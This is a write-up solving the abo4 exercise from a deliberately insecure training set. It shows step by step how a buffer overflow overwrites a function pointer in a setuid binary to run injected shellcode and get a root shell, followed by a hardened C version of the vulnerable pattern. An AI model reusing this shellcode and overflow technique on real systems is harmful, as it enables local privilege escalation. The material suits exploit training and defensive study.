/
| [exp-abo4.txt] Thu Mar 23 19:03:41 CET 2006
|
| abo4.c exploit - solution 1
| http://community.core-sdi.com/~gera/InsecureProgramming/abo4.c
|
| Copyright: bunker - http://rawlab.altervista.org
| 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
\

NB: Because system() drops privileges, I've used merged plt (*) and classic (**) techniques.
(**) [Overwriting return address]

/
| Suid abo4 (testing)
\

bunker@syn:~/abo4$ su
Password:
root@syn:/home/bunker/abo4# chown root.root abo4
root@syn:/home/bunker/abo4# chmod +s abo4
root@syn:/home/bunker/abo4# exit
exit

/
| Put bytecode in file "bcode"
\

bunker@syn:~/abo4$ perl -e 'print "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"' > bcode

/
| Export BCODE env with NOPx100 + bcode
\

bunker@syn:~/abo4$ export BCODE=`perl -e 'print "\x90"x100'``cat bcode`

/
| Find $BCODE address (see exp-abo3.txt for getenvaddr.c)
\

bunker@syn:~/abo1$ ./getenvaddr BCODE
BCODE is located at 0xbfffff1d

/
| (*) Procedure Linkage Table
\

bunker@syn:~/abo4$ readelf -a abo4 | grep fn
   126: 08049728     4 OBJECT  GLOBAL DEFAULT   22 fn

/
| Execute abo4, fill buffer with $BCODE address
\

bunker@syn:~/abo4$ ./abo4 `perl -e 'print "\x28\x97\x04\x08"x70'` `perl -e 'print "\x1f\xff\xff\xbf"'` "FAKE"
sh-3.1# id
uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)

/
| Boom! :D
\
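As an added defender-side example (mine, not part of bunker's write-up or of gera's challenge code), here is a bounds-checked variant of the pattern abo4.c is assumed to have: a writable global function pointer fn, a 256-byte stack buffer and a heap copy of the second argument, all filled from argv by unchecked strcpy calls. Refusing over-long input before any copy means the 280-byte first argument shown in the transcript can no longer reach the pointer that later redirects fn. The abo4.c structure, the 256-byte size and the helper names safe_copy and guarded_main are my assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed abo4 layout: a writable global function pointer the program
 * reassigns before calling it. The transcript above overwrites fn with
 * the BCODE address; keeping every copy inside its buffer prevents that. */
int (*fn)(const char *) = puts;

/* Copy src into dst only if it fits (NUL included). Returns 0 on
 * success, -1 if src is too long; nothing is written on failure. */
int safe_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstsz)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened main body (hypothetical name). Returns 1 if an argument was
 * rejected or allocation failed, 0 otherwise. buf is 256 bytes; the
 * 280-byte first argument from the transcript is refused instead of
 * running past buf into the neighbouring heap pointer. */
int guarded_main(int argc, char **argv)
{
    char buf[256];
    char *pbuf;

    if (argc < 4) {
        fputs("usage: abo4 <arg1> <arg2> <arg3>\n", stderr);
        return 1;
    }
    if (safe_copy(buf, sizeof buf, argv[1]) != 0)
        return 1;
    pbuf = malloc(strlen(argv[2]) + 1);
    if (pbuf == NULL)
        return 1;
    memcpy(pbuf, argv[2], strlen(argv[2]) + 1);  /* exact-size heap copy */
    fn(argv[3]);                                 /* fn still points at puts */
    free(pbuf);
    return 0;
}

int main(int argc, char **argv)
{
    return guarded_main(argc, argv);
}
```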